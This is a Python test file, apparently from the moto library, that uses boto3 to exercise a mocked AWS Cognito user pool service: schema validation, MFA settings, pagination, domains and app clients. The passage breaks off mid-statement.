import base64 import boto3 import json import os import random import re import moto.cognitoidp.models import requests import hmac import hashlib import uuid # noinspection PyUnresolvedReferences import sure # noqa # pylint: disable=unused-import from botocore.exceptions import ClientError, ParamValidationError from jose import jws, jwt from unittest import SkipTest import pytest from moto import mock_cognitoidp, settings from moto.cognitoidp.utils import create_id from moto.core import ACCOUNT_ID @mock_cognitoidp def test_create_user_pool(): conn = boto3.client("cognito-idp", "us-west-2") name = str(uuid.uuid4()) value = str(uuid.uuid4()) result = conn.create_user_pool(PoolName=name, LambdaConfig={"PreSignUp": value}) result["UserPool"]["Id"].should_not.be.none result["UserPool"]["Id"].should.match(r"[\w-]+_[0-9a-zA-Z]+") result["UserPool"]["Arn"].should.equal( "arn:aws:cognito-idp:us-west-2:{}:userpool/{}".format( ACCOUNT_ID, result["UserPool"]["Id"] ) ) result["UserPool"]["Name"].should.equal(name) result["UserPool"]["LambdaConfig"]["PreSignUp"].should.equal(value) @mock_cognitoidp def test_create_user_pool_should_have_all_default_attributes_in_schema(): conn = boto3.client("cognito-idp", "us-west-2") name = str(uuid.uuid4()) result = conn.create_user_pool(PoolName=name) result_schema = result["UserPool"]["SchemaAttributes"] result_schema = {s["Name"]: s for s in result_schema} described_schema = conn.describe_user_pool(UserPoolId=result["UserPool"]["Id"])[ "UserPool" ]["SchemaAttributes"] described_schema = {s["Name"]: s for s in described_schema} for schema in result_schema, described_schema: for ( default_attr_name, default_attr, ) in moto.cognitoidp.models.CognitoIdpUserPoolAttribute.STANDARD_SCHEMA.items(): attribute = schema[default_attr_name] attribute["Required"].should.equal(default_attr["Required"]) attribute["AttributeDataType"].should.equal( default_attr["AttributeDataType"] ) attribute["Mutable"].should.equal(default_attr["Mutable"]) attribute.get("StringAttributeConstraints", None).should.equal( default_attr.get("StringAttributeConstraints", None) ) attribute.get("NumberAttributeConstraints", None).should.equal( default_attr.get("NumberAttributeConstraints", None) ) attribute["DeveloperOnlyAttribute"].should.be.false @mock_cognitoidp def test_create_user_pool_unknown_attribute_data_type(): conn = boto3.client("cognito-idp", "us-west-2") name = str(uuid.uuid4()) attribute_data_type = "Banana" with pytest.raises(ClientError) as ex: conn.create_user_pool( PoolName=name, Schema=[{"Name": "custom", "AttributeDataType": attribute_data_type,},], ) ex.value.response["Error"]["Code"].should.equal("InvalidParameterException") ex.value.response["Error"]["Message"].should.equal( f"Validation error detected: Value '{attribute_data_type}' failed to satisfy constraint: Member must satisfy enum value set: [Boolean, Number, String, DateTime]" ) ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400) @mock_cognitoidp def test_create_user_pool_custom_attribute_without_data_type(): conn = boto3.client("cognito-idp", "us-west-2") with pytest.raises(ClientError) as ex: conn.create_user_pool(PoolName=str(uuid.uuid4()), Schema=[{"Name": "custom",},]) ex.value.response["Error"]["Code"].should.equal("InvalidParameterException") ex.value.response["Error"]["Message"].should.equal( "Invalid AttributeDataType input, consider using the provided AttributeDataType enum." 
) ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400) @mock_cognitoidp def test_create_user_pool_custom_attribute_defaults(): conn = boto3.client("cognito-idp", "us-west-2") res = conn.create_user_pool( PoolName=str(uuid.uuid4()), Schema=[ {"Name": "string", "AttributeDataType": "String",}, {"Name": "number", "AttributeDataType": "Number",}, ], ) string_attribute = next( attr for attr in res["UserPool"]["SchemaAttributes"] if attr["Name"] == "custom:string" ) string_attribute["DeveloperOnlyAttribute"].should.be.false string_attribute["Mutable"].should.be.true string_attribute.get("StringAttributeConstraints").should.be.none number_attribute = next( attr for attr in res["UserPool"]["SchemaAttributes"] if attr["Name"] == "custom:number" ) number_attribute["DeveloperOnlyAttribute"].should.be.false number_attribute["Mutable"].should.be.true number_attribute.get("NumberAttributeConstraints").should.be.none @mock_cognitoidp def test_create_user_pool_custom_attribute_developer_only(): conn = boto3.client("cognito-idp", "us-west-2") res = conn.create_user_pool( PoolName=str(uuid.uuid4()), Schema=[ { "Name": "banana", "AttributeDataType": "String", "DeveloperOnlyAttribute": True, }, ], ) # Note that this time we are looking for 'dev:xyz' attribute attribute = next( attr for attr in res["UserPool"]["SchemaAttributes"] if attr["Name"] == "dev:custom:banana" ) attribute["DeveloperOnlyAttribute"].should.be.true @mock_cognitoidp def test_create_user_pool_custom_attribute_required(): conn = boto3.client("cognito-idp", "us-west-2") with pytest.raises(ClientError) as ex: conn.create_user_pool( PoolName=str(uuid.uuid4()), Schema=[ {"Name": "banana", "AttributeDataType": "String", "Required": True}, ], ) ex.value.response["Error"]["Code"].should.equal("InvalidParameterException") ex.value.response["Error"]["Message"].should.equal( "Required custom attributes are not supported currently." 
) ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400) @mock_cognitoidp @pytest.mark.parametrize( "attribute", [ {"Name": "email", "AttributeDataType": "Number"}, {"Name": "email", "DeveloperOnlyAttribute": True}, ], ids=["standard_attribute", "developer_only"], ) def test_create_user_pool_standard_attribute_with_changed_data_type_or_developer_only( attribute, ): conn = boto3.client("cognito-idp", "us-west-2") with pytest.raises(ClientError) as ex: conn.create_user_pool(PoolName=str(uuid.uuid4()), Schema=[attribute]) ex.value.response["Error"]["Code"].should.equal("InvalidParameterException") ex.value.response["Error"]["Message"].should.equal( f"You can not change AttributeDataType or set developerOnlyAttribute for standard schema attribute {attribute['Name']}" ) ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400) @mock_cognitoidp def test_create_user_pool_attribute_with_schema(): conn = boto3.client("cognito-idp", "us-west-2") res = conn.create_user_pool( PoolName=str(uuid.uuid4()), Schema=[ { "Name": "string", "AttributeDataType": "String", "NumberAttributeConstraints": {"MinValue": "10", "MaxValue": "20"}, "StringAttributeConstraints": {"MinLength": "10", "MaxLength": "20"}, }, { "Name": "number", "AttributeDataType": "Number", "NumberAttributeConstraints": {"MinValue": "10", "MaxValue": "20"}, "StringAttributeConstraints": {"MinLength": "10", "MaxLength": "20"}, }, { "Name": "boolean", "AttributeDataType": "Boolean", "NumberAttributeConstraints": {"MinValue": "10", "MaxValue": "20"}, "StringAttributeConstraints": {"MinLength": "10", "MaxLength": "20"}, }, ], ) string_attribute = next( attr for attr in res["UserPool"]["SchemaAttributes"] if attr["Name"] == "custom:string" ) string_attribute["StringAttributeConstraints"].should.equal( {"MinLength": "10", "MaxLength": "20"} ) string_attribute.get("NumberAttributeConstraints").should.be.none number_attribute = next( attr for attr in res["UserPool"]["SchemaAttributes"] if attr["Name"] == "custom:number" ) number_attribute["NumberAttributeConstraints"].should.equal( {"MinValue": "10", "MaxValue": "20"} ) number_attribute.get("StringAttributeConstraints").should.be.none boolean_attribute = next( attr for attr in res["UserPool"]["SchemaAttributes"] if attr["Name"] == "custom:boolean" ) boolean_attribute.get("NumberAttributeConstraints").should.be.none boolean_attribute.get("StringAttributeConstraints").should.be.none @mock_cognitoidp def test_create_user_pool_attribute_partial_schema(): conn = boto3.client("cognito-idp", "us-west-2") res = conn.create_user_pool( PoolName=str(uuid.uuid4()), Schema=[ { "Name": "string_no_min", "AttributeDataType": "String", "StringAttributeConstraints": {"MaxLength": "10"}, }, { "Name": "string_no_max", "AttributeDataType": "String", "StringAttributeConstraints": {"MinLength": "10"}, }, { "Name": "number_no_min", "AttributeDataType": "Number", "NumberAttributeConstraints": {"MaxValue": "10"}, }, { "Name": "number_no_max", "AttributeDataType": "Number", "NumberAttributeConstraints": {"MinValue": "10"}, }, ], ) string_no_min = next( attr for attr in res["UserPool"]["SchemaAttributes"] if attr["Name"] == "custom:string_no_min" ) string_no_max = next( attr for attr in res["UserPool"]["SchemaAttributes"] if attr["Name"] == "custom:string_no_max" ) number_no_min = next( attr for attr in res["UserPool"]["SchemaAttributes"] if attr["Name"] == "custom:number_no_min" ) number_no_max = next( attr for attr in res["UserPool"]["SchemaAttributes"] if attr["Name"] == 
"custom:number_no_max" ) string_no_min["StringAttributeConstraints"]["MaxLength"].should.equal("10") string_no_min["StringAttributeConstraints"].get("MinLength", None).should.be.none string_no_max["StringAttributeConstraints"]["MinLength"].should.equal("10") string_no_max["StringAttributeConstraints"].get("MaxLength", None).should.be.none number_no_min["NumberAttributeConstraints"]["MaxValue"].should.equal("10") number_no_min["NumberAttributeConstraints"].get("MinValue", None).should.be.none number_no_max["NumberAttributeConstraints"]["MinValue"].should.equal("10") number_no_max["NumberAttributeConstraints"].get("MaxValue", None).should.be.none @mock_cognitoidp @pytest.mark.parametrize( ("constraint_type", "attribute"), [ ( "StringAttributeConstraints", { "Name": "email", "AttributeDataType": "String", "StringAttributeConstraints": {"MinLength": "invalid_value"}, }, ), ( "StringAttributeConstraints", { "Name": "email", "AttributeDataType": "String", "StringAttributeConstraints": {"MaxLength": "invalid_value"}, }, ), ( "NumberAttributeConstraints", { "Name": "updated_at", "AttributeDataType": "Number", "NumberAttributeConstraints": {"MaxValue": "invalid_value"}, }, ), ( "NumberAttributeConstraints", { "Name": "updated_at", "AttributeDataType": "Number", "NumberAttributeConstraints": {"MinValue": "invalid_value"}, }, ), ], ids=[ "invalid_min_length", "invalid_max_length", "invalid_max_value", "invalid_min_value", ], ) def test_create_user_pool_invalid_schema_values(constraint_type, attribute): conn = boto3.client("cognito-idp", "us-west-2") with pytest.raises(ClientError) as ex: conn.create_user_pool(PoolName=str(uuid.uuid4()), Schema=[attribute]) ex.value.response["Error"]["Code"].should.equal("InvalidParameterException") ex.value.response["Error"]["Message"].should.equal( f"Invalid {constraint_type} for schema attribute {attribute['Name']}" ) ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400) @mock_cognitoidp @pytest.mark.parametrize( "attribute", [ { "Name": "email", "AttributeDataType": "String", "StringAttributeConstraints": {"MinLength": "2049"}, }, { "Name": "email", "AttributeDataType": "String", "StringAttributeConstraints": {"MaxLength": "2049"}, }, ], ids=["invalid_min_length", "invalid_max_length"], ) def test_create_user_pool_string_schema_max_length_over_2048(attribute): conn = boto3.client("cognito-idp", "us-west-2") with pytest.raises(ClientError) as ex: conn.create_user_pool(PoolName=str(uuid.uuid4()), Schema=[attribute]) ex.value.response["Error"]["Code"].should.equal("InvalidParameterException") ex.value.response["Error"]["Message"].should.equal( f"user.{attribute['Name']}: String attributes cannot have a length of more than 2048" ) ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400) @mock_cognitoidp def test_create_user_pool_string_schema_min_bigger_than_max(): conn = boto3.client("cognito-idp", "us-west-2") with pytest.raises(ClientError) as ex: conn.create_user_pool( PoolName=str(uuid.uuid4()), Schema=[ { "Name": "email", "AttributeDataType": "String", "StringAttributeConstraints": {"MinLength": "2", "MaxLength": "1"}, } ], ) ex.value.response["Error"]["Code"].should.equal("InvalidParameterException") ex.value.response["Error"]["Message"].should.equal( f"user.email: Max length cannot be less than min length." 
) ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400) @mock_cognitoidp def test_create_user_pool_number_schema_min_bigger_than_max(): conn = boto3.client("cognito-idp", "us-west-2") with pytest.raises(ClientError) as ex: conn.create_user_pool( PoolName=str(uuid.uuid4()), Schema=[ { "Name": "updated_at", "AttributeDataType": "Number", "NumberAttributeConstraints": {"MinValue": "2", "MaxValue": "1"}, } ], ) ex.value.response["Error"]["Code"].should.equal("InvalidParameterException") ex.value.response["Error"]["Message"].should.equal( f"user.updated_at: Max value cannot be less than min value." ) ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400) @mock_cognitoidp def test_add_custom_attributes(): conn = boto3.client("cognito-idp", "us-west-2") pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] custom_attribute = {"Name": "banana", "AttributeDataType": "String"} res = conn.add_custom_attributes( UserPoolId=pool_id, CustomAttributes=[custom_attribute] ) res["ResponseMetadata"]["HTTPStatusCode"].should.equal(200) res = conn.describe_user_pool(UserPoolId=pool_id) described_attribute = next( attr for attr in res["UserPool"]["SchemaAttributes"] if attr["Name"] == "custom:banana" ) # Skip verification - already covered by create_user_pool with custom attributes described_attribute.should_not.be.none @mock_cognitoidp def test_add_custom_attributes_existing_attribute(): conn = boto3.client("cognito-idp", "us-west-2") custom_attribute = { "Name": "banana", "AttributeDataType": "String", "DeveloperOnlyAttribute": True, } pool_id = conn.create_user_pool( PoolName=str(uuid.uuid4()), Schema=[custom_attribute] )["UserPool"]["Id"] with pytest.raises(ClientError) as ex: conn.add_custom_attributes( UserPoolId=pool_id, CustomAttributes=[custom_attribute] ) ex.value.response["Error"]["Code"].should.equal("InvalidParameterException") ex.value.response["Error"]["Message"].should.equal( f"custom:banana: Existing attribute already has name dev:custom:banana." ) ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400) @mock_cognitoidp def test_list_user_pools(): conn = boto3.client("cognito-idp", "us-west-2") name = str(uuid.uuid4()) conn.create_user_pool(PoolName=name) result = conn.list_user_pools(MaxResults=10) result["UserPools"].should.have.length_of(1) result["UserPools"][0]["Name"].should.equal(name) @mock_cognitoidp def test_set_user_pool_mfa_config(): conn = boto3.client("cognito-idp", "us-west-2") name = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=name)["UserPool"]["Id"] # Test error for when neither token nor sms configuration is provided with pytest.raises(ClientError) as ex: conn.set_user_pool_mfa_config( UserPoolId=user_pool_id, MfaConfiguration="ON", ) ex.value.operation_name.should.equal("SetUserPoolMfaConfig") ex.value.response["Error"]["Code"].should.equal("InvalidParameterException") ex.value.response["Error"]["Message"].should.equal( "At least one of [SmsMfaConfiguration] or [SoftwareTokenMfaConfiguration] must be provided." 
) ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400) # Test error for when sms config is missing `SmsConfiguration` with pytest.raises(ClientError) as ex: conn.set_user_pool_mfa_config( UserPoolId=user_pool_id, SmsMfaConfiguration={}, MfaConfiguration="ON", ) ex.value.response["Error"]["Code"].should.equal("InvalidParameterException") ex.value.response["Error"]["Message"].should.equal( "[SmsConfiguration] is a required member of [SoftwareTokenMfaConfiguration]." ) ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400) # Test error for when `SmsConfiguration` is missing `SnsCaller` # This is asserted by boto3 with pytest.raises(ParamValidationError) as ex: conn.set_user_pool_mfa_config( UserPoolId=user_pool_id, SmsMfaConfiguration={"SmsConfiguration": {}}, MfaConfiguration="ON", ) # Test error for when `MfaConfiguration` is not one of the expected values with pytest.raises(ClientError) as ex: conn.set_user_pool_mfa_config( UserPoolId=user_pool_id, SoftwareTokenMfaConfiguration={"Enabled": True}, MfaConfiguration="Invalid", ) ex.value.response["Error"]["Code"].should.equal("InvalidParameterException") ex.value.response["Error"]["Message"].should.equal( "[MfaConfiguration] must be one of 'ON', 'OFF', or 'OPTIONAL'." ) ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400) # Enable software token MFA mfa_config = conn.set_user_pool_mfa_config( UserPoolId=user_pool_id, SoftwareTokenMfaConfiguration={"Enabled": True}, MfaConfiguration="ON", ) mfa_config.shouldnt.have.key("SmsMfaConfiguration") mfa_config["MfaConfiguration"].should.equal("ON") mfa_config["SoftwareTokenMfaConfiguration"].should.equal({"Enabled": True}) # Response from describe should match pool = conn.describe_user_pool(UserPoolId=user_pool_id)["UserPool"] pool["MfaConfiguration"].should.equal("ON") # Disable MFA mfa_config = conn.set_user_pool_mfa_config( UserPoolId=user_pool_id, MfaConfiguration="OFF", ) mfa_config.shouldnt.have.key("SmsMfaConfiguration") mfa_config.shouldnt.have.key("SoftwareTokenMfaConfiguration") mfa_config["MfaConfiguration"].should.equal("OFF") # Response from describe should match pool = conn.describe_user_pool(UserPoolId=user_pool_id)["UserPool"] pool["MfaConfiguration"].should.equal("OFF") # `SnsCallerArn` needs to be at least 20 long sms_config = {"SmsConfiguration": {"SnsCallerArn": "01234567890123456789"}} # Enable SMS MFA mfa_config = conn.set_user_pool_mfa_config( UserPoolId=user_pool_id, SmsMfaConfiguration=sms_config, MfaConfiguration="ON", ) mfa_config.shouldnt.have.key("SoftwareTokenMfaConfiguration") mfa_config["SmsMfaConfiguration"].should.equal(sms_config) mfa_config["MfaConfiguration"].should.equal("ON") @mock_cognitoidp def test_list_user_pools_returns_max_items(): conn = boto3.client("cognito-idp", "us-west-2") # Given 10 user pools pool_count = 10 for _ in range(pool_count): conn.create_user_pool(PoolName=str(uuid.uuid4())) max_results = 5 result = conn.list_user_pools(MaxResults=max_results) result["UserPools"].should.have.length_of(max_results) result.should.have.key("NextToken") @mock_cognitoidp def test_list_user_pools_returns_next_tokens(): conn = boto3.client("cognito-idp", "us-west-2") # Given 10 user pool clients pool_count = 10 for _ in range(pool_count): conn.create_user_pool(PoolName=str(uuid.uuid4())) max_results = 5 result = conn.list_user_pools(MaxResults=max_results) result["UserPools"].should.have.length_of(max_results) result.should.have.key("NextToken") next_token = result["NextToken"] result_2 = 
conn.list_user_pools(MaxResults=max_results, NextToken=next_token) result_2["UserPools"].should.have.length_of(max_results) result_2.shouldnt.have.key("NextToken") @mock_cognitoidp def test_list_user_pools_when_max_items_more_than_total_items(): conn = boto3.client("cognito-idp", "us-west-2") # Given 10 user pool clients pool_count = 10 for _ in range(pool_count): conn.create_user_pool(PoolName=str(uuid.uuid4())) max_results = pool_count + 5 result = conn.list_user_pools(MaxResults=max_results) result["UserPools"].should.have.length_of(pool_count) result.shouldnt.have.key("NextToken") @mock_cognitoidp def test_describe_user_pool(): conn = boto3.client("cognito-idp", "us-west-2") name = str(uuid.uuid4()) value = str(uuid.uuid4()) user_pool_details = conn.create_user_pool( PoolName=name, LambdaConfig={"PreSignUp": value}, AccountRecoverySetting={ "RecoveryMechanisms": [{"Name": "verified_email", "Priority": 1}] }, ) result = conn.describe_user_pool(UserPoolId=user_pool_details["UserPool"]["Id"]) result["UserPool"]["Name"].should.equal(name) result["UserPool"]["LambdaConfig"]["PreSignUp"].should.equal(value) result["UserPool"]["AccountRecoverySetting"]["RecoveryMechanisms"][0][ "Name" ].should.equal("verified_email") result["UserPool"]["AccountRecoverySetting"]["RecoveryMechanisms"][0][ "Priority" ].should.equal(1) @mock_cognitoidp def test_describe_user_pool_estimated_number_of_users(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] result = conn.describe_user_pool(UserPoolId=user_pool_id) result["UserPool"]["EstimatedNumberOfUsers"].should.equal(0) users_count = random.randint(2, 6) for _ in range(users_count): conn.admin_create_user(UserPoolId=user_pool_id, Username=str(uuid.uuid4())) result = conn.describe_user_pool(UserPoolId=user_pool_id) result["UserPool"]["EstimatedNumberOfUsers"].should.equal(users_count) @mock_cognitoidp def test_describe_user_pool_resource_not_found(): conn = boto3.client("cognito-idp", "us-east-1") user_pool_id = "us-east-1_FooBar123" with pytest.raises(ClientError) as exc: conn.describe_user_pool(UserPoolId=user_pool_id) err = exc.value.response["Error"] err["Code"].should.equal("ResourceNotFoundException") err["Message"].should.equal(f"User pool {user_pool_id} does not exist.") @mock_cognitoidp def test_update_user_pool(): conn = boto3.client("cognito-idp", "us-east-1") name = str(uuid.uuid4()) user_pool_details = conn.create_user_pool( PoolName=name, Policies={ "PasswordPolicy": { "MinimumLength": 12, "RequireUppercase": False, "RequireLowercase": False, "RequireNumbers": False, "RequireSymbols": False, } }, ) new_policies = { "PasswordPolicy": { "MinimumLength": 16, "RequireUppercase": True, "RequireLowercase": True, "RequireNumbers": True, "RequireSymbols": True, } } conn.update_user_pool( UserPoolId=user_pool_details["UserPool"]["Id"], Policies=new_policies ) updated_user_pool_details = conn.describe_user_pool( UserPoolId=user_pool_details["UserPool"]["Id"] ) updated_user_pool_details["UserPool"]["Policies"].should.equal(new_policies) @mock_cognitoidp def test_delete_user_pool(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.list_user_pools(MaxResults=10)["UserPools"].should.have.length_of(1) conn.delete_user_pool(UserPoolId=user_pool_id) conn.list_user_pools(MaxResults=10)["UserPools"].should.have.length_of(0) @mock_cognitoidp def test_create_user_pool_domain(): conn = 
boto3.client("cognito-idp", "us-west-2") domain = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] result = conn.create_user_pool_domain(UserPoolId=user_pool_id, Domain=domain) result["ResponseMetadata"]["HTTPStatusCode"].should.equal(200) result["CloudFrontDomain"].should_not.be.none @mock_cognitoidp def test_create_user_pool_domain_custom_domain_config(): conn = boto3.client("cognito-idp", "us-west-2") domain = str(uuid.uuid4()) custom_domain_config = { "CertificateArn": "arn:aws:acm:us-east-1:{}:certificate/123456789012".format( ACCOUNT_ID ) } user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] result = conn.create_user_pool_domain( UserPoolId=user_pool_id, Domain=domain, CustomDomainConfig=custom_domain_config ) result["ResponseMetadata"]["HTTPStatusCode"].should.equal(200) result["CloudFrontDomain"].should.equal("e2c343b3293ee505.cloudfront.net") @mock_cognitoidp def test_describe_user_pool_domain(): conn = boto3.client("cognito-idp", "us-west-2") domain = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.create_user_pool_domain(UserPoolId=user_pool_id, Domain=domain) result = conn.describe_user_pool_domain(Domain=domain) result["DomainDescription"]["Domain"].should.equal(domain) result["DomainDescription"]["UserPoolId"].should.equal(user_pool_id) result["DomainDescription"]["AWSAccountId"].should_not.be.none @mock_cognitoidp def test_delete_user_pool_domain(): conn = boto3.client("cognito-idp", "us-west-2") domain = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.create_user_pool_domain(UserPoolId=user_pool_id, Domain=domain) result = conn.delete_user_pool_domain(UserPoolId=user_pool_id, Domain=domain) result["ResponseMetadata"]["HTTPStatusCode"].should.equal(200) result = conn.describe_user_pool_domain(Domain=domain) # This is a surprising behavior of the real service: describing a missing domain comes # back with status 200 and a DomainDescription of {} result["ResponseMetadata"]["HTTPStatusCode"].should.equal(200) result["DomainDescription"].keys().should.have.length_of(0) @mock_cognitoidp def test_update_user_pool_domain(): conn = boto3.client("cognito-idp", "us-west-2") domain = str(uuid.uuid4()) custom_domain_config = { "CertificateArn": "arn:aws:acm:us-east-1:{}:certificate/123456789012".format( ACCOUNT_ID ) } user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.create_user_pool_domain(UserPoolId=user_pool_id, Domain=domain) result = conn.update_user_pool_domain( UserPoolId=user_pool_id, Domain=domain, CustomDomainConfig=custom_domain_config ) result["ResponseMetadata"]["HTTPStatusCode"].should.equal(200) result["CloudFrontDomain"].should.equal("e2c343b3293ee505.cloudfront.net") @mock_cognitoidp def test_create_user_pool_client(): conn = boto3.client("cognito-idp", "us-west-2") client_name = str(uuid.uuid4()) value = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] result = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=client_name, CallbackURLs=[value] ) result["UserPoolClient"]["UserPoolId"].should.equal(user_pool_id) bool(re.match(r"^[0-9a-z]{26}$", result["UserPoolClient"]["ClientId"])).should.be.ok result["UserPoolClient"]["ClientName"].should.equal(client_name) result["UserPoolClient"].should_not.have.key("ClientSecret") 
result["UserPoolClient"]["CallbackURLs"].should.have.length_of(1) result["UserPoolClient"]["CallbackURLs"][0].should.equal(value) @mock_cognitoidp def test_create_user_pool_client_returns_secret(): conn = boto3.client("cognito-idp", "us-west-2") client_name = str(uuid.uuid4()) value = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] result = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=client_name, GenerateSecret=True, CallbackURLs=[value], ) result["UserPoolClient"]["UserPoolId"].should.equal(user_pool_id) bool(re.match(r"^[0-9a-z]{26}$", result["UserPoolClient"]["ClientId"])).should.be.ok result["UserPoolClient"]["ClientName"].should.equal(client_name) result["UserPoolClient"]["ClientSecret"].should_not.be.none result["UserPoolClient"]["CallbackURLs"].should.have.length_of(1) result["UserPoolClient"]["CallbackURLs"][0].should.equal(value) @mock_cognitoidp def test_list_user_pool_clients(): conn = boto3.client("cognito-idp", "us-west-2") client_name = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.create_user_pool_client(UserPoolId=user_pool_id, ClientName=client_name) result = conn.list_user_pool_clients(UserPoolId=user_pool_id, MaxResults=10) result["UserPoolClients"].should.have.length_of(1) result["UserPoolClients"][0]["ClientName"].should.equal(client_name) @mock_cognitoidp def test_list_user_pool_clients_returns_max_items(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] # Given 10 user pool clients client_count = 10 for _ in range(client_count): client_name = str(uuid.uuid4()) conn.create_user_pool_client(UserPoolId=user_pool_id, ClientName=client_name) max_results = 5 result = conn.list_user_pool_clients( UserPoolId=user_pool_id, MaxResults=max_results ) result["UserPoolClients"].should.have.length_of(max_results) result.should.have.key("NextToken") @mock_cognitoidp def test_list_user_pool_clients_returns_next_tokens(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] # Given 10 user pool clients client_count = 10 for _ in range(client_count): client_name = str(uuid.uuid4()) conn.create_user_pool_client(UserPoolId=user_pool_id, ClientName=client_name) max_results = 5 result = conn.list_user_pool_clients( UserPoolId=user_pool_id, MaxResults=max_results ) result["UserPoolClients"].should.have.length_of(max_results) result.should.have.key("NextToken") next_token = result["NextToken"] result_2 = conn.list_user_pool_clients( UserPoolId=user_pool_id, MaxResults=max_results, NextToken=next_token ) result_2["UserPoolClients"].should.have.length_of(max_results) result_2.shouldnt.have.key("NextToken") @mock_cognitoidp def test_list_user_pool_clients_when_max_items_more_than_total_items(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] # Given 10 user pool clients client_count = 10 for _ in range(client_count): client_name = str(uuid.uuid4()) conn.create_user_pool_client(UserPoolId=user_pool_id, ClientName=client_name) max_results = client_count + 5 result = conn.list_user_pool_clients( UserPoolId=user_pool_id, MaxResults=max_results ) result["UserPoolClients"].should.have.length_of(client_count) result.shouldnt.have.key("NextToken") @mock_cognitoidp def test_describe_user_pool_client(): conn = 
boto3.client("cognito-idp", "us-west-2") client_name = str(uuid.uuid4()) value = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] client_details = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=client_name, CallbackURLs=[value] ) result = conn.describe_user_pool_client( UserPoolId=user_pool_id, ClientId=client_details["UserPoolClient"]["ClientId"] ) result["UserPoolClient"]["ClientName"].should.equal(client_name) result["UserPoolClient"]["CallbackURLs"].should.have.length_of(1) result["UserPoolClient"]["CallbackURLs"][0].should.equal(value) @mock_cognitoidp def test_update_user_pool_client(): conn = boto3.client("cognito-idp", "us-west-2") old_client_name = str(uuid.uuid4()) new_client_name = str(uuid.uuid4()) old_value = str(uuid.uuid4()) new_value = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] client_details = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=old_client_name, CallbackURLs=[old_value] ) result = conn.update_user_pool_client( UserPoolId=user_pool_id, ClientId=client_details["UserPoolClient"]["ClientId"], ClientName=new_client_name, CallbackURLs=[new_value], ) result["UserPoolClient"]["ClientName"].should.equal(new_client_name) result["UserPoolClient"].should_not.have.key("ClientSecret") result["UserPoolClient"]["CallbackURLs"].should.have.length_of(1) result["UserPoolClient"]["CallbackURLs"][0].should.equal(new_value) @mock_cognitoidp def test_update_user_pool_client_returns_secret(): conn = boto3.client("cognito-idp", "us-west-2") old_client_name = str(uuid.uuid4()) new_client_name = str(uuid.uuid4()) old_value = str(uuid.uuid4()) new_value = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] client_details = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=old_client_name, GenerateSecret=True, CallbackURLs=[old_value], ) client_secret = client_details["UserPoolClient"]["ClientSecret"] result = conn.update_user_pool_client( UserPoolId=user_pool_id, ClientId=client_details["UserPoolClient"]["ClientId"], ClientName=new_client_name, CallbackURLs=[new_value], ) result["UserPoolClient"]["ClientName"].should.equal(new_client_name) result["UserPoolClient"]["ClientSecret"].should.equal(client_secret) result["UserPoolClient"]["CallbackURLs"].should.have.length_of(1) result["UserPoolClient"]["CallbackURLs"][0].should.equal(new_value) @mock_cognitoidp def test_delete_user_pool_client(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] client_details = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()) ) conn.delete_user_pool_client( UserPoolId=user_pool_id, ClientId=client_details["UserPoolClient"]["ClientId"] ) caught = False try: conn.describe_user_pool_client( UserPoolId=user_pool_id, ClientId=client_details["UserPoolClient"]["ClientId"], ) except conn.exceptions.ResourceNotFoundException: caught = True caught.should.be.true @mock_cognitoidp def test_create_identity_provider(): conn = boto3.client("cognito-idp", "us-west-2") provider_name = str(uuid.uuid4()) provider_type = "Facebook" value = str(uuid.uuid4()) user_pool_id = 